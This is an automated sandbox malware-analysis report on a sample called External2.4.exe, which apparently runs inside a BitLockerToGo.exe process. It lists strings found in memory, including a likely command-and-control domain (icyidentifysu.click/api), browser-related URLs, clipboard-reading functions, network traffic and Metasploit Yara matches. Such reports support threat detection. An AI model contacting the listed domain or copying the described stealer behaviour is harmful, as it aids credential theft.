Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: External2.4.exe	String found in binary or memory: http://hu.yamlhybull;hyphen;hyundaiiacute;id.yamlie.yamligrave;iiiint;iinfin;il.yamlim.yamlin.yamlin
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000004.00000003.2051472825.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000004.00000003.2052701545.0000000005439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000004.00000003.2052701545.0000000005439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: External2.4.exe	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079128879.0000000003191000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2079200625.000000000319A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/
Source: BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157658912.0000000003111000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/api
Source: BitLockerToGo.exe, 00000004.00000003.2118065257.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/apiN
Source: BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/apigy
Source: BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/bu
Source: BitLockerToGo.exe, 00000004.00000003.2118065257.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2156871633.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2157887980.00000000031A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/bui
Source: BitLockerToGo.exe, 00000004.00000003.2118065257.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100856072.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2100723310.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click/pi
Source: BitLockerToGo.exe, 00000004.00000002.2157658912.0000000003111000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://icyidentifysu.click:443/api
Source: BitLockerToGo.exe, 00000004.00000003.2052701545.0000000005439000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000004.00000003.2005681459.000000000548F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000004.00000003.2005681459.000000000548F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000004.00000003.2005681459.000000000548F000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000004.00000003.2005730334.0000000005465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000004.00000003.2075101001.0000000005438000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075455011.0000000005438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 00000004.00000003.2005115006.000000000547A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2004940054.000000000547D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2005188335.000000000547A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000004.00000003.2052414372.0000000005553000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.4:49742 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_00431020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00431020

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_00431020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

4_2_00431020

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1960437943.000000000B508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00420940	4_2_00420940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004259F0	4_2_004259F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00436980	4_2_00436980
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00415211	4_2_00415211
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042BA22	4_2_0042BA22
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043E280	4_2_0043E280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004104BE	4_2_004104BE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00439660	4_2_00439660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0040CE98	4_2_0040CE98
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004366B0	4_2_004366B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0040D76F	4_2_0040D76F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042900A	4_2_0042900A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00408810	4_2_00408810
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00411028	4_2_00411028
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043A030	4_2_0043A030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043C8DB	4_2_0043C8DB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00409080	4_2_00409080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0040A930	4_2_0040A930
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00436130	4_2_00436130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0040C93E	4_2_0040C93E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042D1C4	4_2_0042D1C4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004059D0	4_2_004059D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043C9F0	4_2_0043C9F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00437180	4_2_00437180
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00403990	4_2_00403990
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042324C	4_2_0042324C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00426A52	4_2_00426A52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00415A0E	4_2_00415A0E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041721A	4_2_0041721A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004062E0	4_2_004062E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004192F0	4_2_004192F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00425287	4_2_00425287
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00428A95	4_2_00428A95
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041CAB0	4_2_0041CAB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00404340	4_2_00404340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041BB40	4_2_0041BB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00435358	4_2_00435358
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042AB00	4_2_0042AB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043CB20	4_2_0043CB20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042BA1D	4_2_0042BA1D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00411B30	4_2_00411B30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004233CA	4_2_004233CA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042CBE3	4_2_0042CBE3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00439BF0	4_2_00439BF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00417BFA	4_2_00417BFA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00437BA9	4_2_00437BA9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00402BB0	4_2_00402BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043CBB0	4_2_0043CBB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041FC50	4_2_0041FC50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00404C70	4_2_00404C70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041D400	4_2_0041D400
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00437420	4_2_00437420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00430C20	4_2_00430C20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041A430	4_2_0041A430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004214C0	4_2_004214C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_004094D0	4_2_004094D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00414CF0	4_2_00414CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00421CAB	4_2_00421CAB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00407550	4_2_00407550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042F550	4_2_0042F550
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041655D	4_2_0041655D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041E520	4_2_0041E520
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043DD20	4_2_0043DD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00409582	4_2_00409582
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0041CD90	4_2_0041CD90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00426D93	4_2_00426D93
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00416DA5	4_2_00416DA5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00425E40	4_2_00425E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00424E40	4_2_00424E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0040AE20	4_2_0040AE20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00423620	4_2_00423620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00435ED0	4_2_00435ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042AE96	4_2_0042AE96
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00417758	4_2_00417758
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00402F60	4_2_00402F60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00406770	4_2_00406770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042577B	4_2_0042577B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00405F20	4_2_00405F20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0042B738	4_2_0042B738
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_00423790	4_2_00423790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_0043DFA0	4_2_0043DFA0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 004080E0 appears 49 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 004141A0 appears 64 times

Source: External2.4.exe, 00000000.00000002.1960437943.000000000B4CE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs External2.4.exe
Source: External2.4.exe, 00000000.00000000.1668837440.000000000199C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs External2.4.exe
Source: External2.4.exe	Binary or memory string: OriginalFileName vs External2.4.exe

Source: External2.4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 00000000.00000002.1960437943.000000000B508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: External2.4.exe	Binary string: ltige EigenschaftUnsupported Media TypeValue must be an arrayValue must be negativeValue must be positiveWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWert muss negativ seinWert muss positiv seinWrong unwind opcode %dX-Content-Type-OptionsXXX_InternalExtensionsYiddish World (yi-001)Yoruba Nigeria (yo-NG)[client-transport %p] [server-transport %p] \Device\NamedPipe\msys^(0[xX])?[0-9a-fA-F]+$address already in useadvapi32.dll not foundapplication/ecmascriptapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbody closed by handlercannot allocate memorycannot unmarshal into compileCallabck: type disable-popup-blockingdriver: bad connectionduplicated defer entryerror decoding messageerror parsing regexp: expected /> in elementexpected end; found %sexpected quoted stringframe_data_pad_too_bigfreeIndex is not validgetenv before env initgrpc-retry-pushback-msgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhttp2: frame too largeidna: invalid label %qinappropriate fallbackindex out of range: %dinteger divide by zerointerface conversion: internal inconsistencyinvalid UTF-8 detectedinvalid address familyinvalid config: %q, %vinvalid empty type URLinvalid number base %dinvalid urn prefix: %qjava_string_check_utf8json: unknown field %qkernel32.dll not foundmalformed HTTP requestmalformed HTTP versionmetrics-recording-onlyminpc or maxpc invalidmissing ']' in addressmultiple :: in addressnetwork is unreachablenon-Go function at pc=oldoverflow is not niloneof type already setoperation was canceledoverflowing coordinateparenthesized pipelinepe: file reader is nilphp_metadata_namespaceproto: bad hexadecimalprotocol not availableprotocol not supportedreadlink not supportedreceived invalid framereflect.MapIter.SetKeyreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changed not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelservice config updatedskipping Question Nameskipping Question Typespan has no free spacestack not a power of 2tag:yaml.org,2002:booltag:yaml.org,2002:nulltrace reader (blocked)trace: alloc too largeundefined variable: %sunexpected http statusunexpected length codeunexpected method stepunexpected right parenunknown parent type %Tvat: country not foundwirep: invalid p statewrite on closed bufferwrong number of fieldsx509: malformed issuerxn--clchc0ea0b2g2a9gcdzero length BIT STRINGzlib: invalid checksum{%v %v %v %v %v %v %v} into Go value of type %q in unquoted attr: %q%v has unknown kind: %v(\d+\.\d+\|[a-zA-Z0-9]+)) must be a power of 2
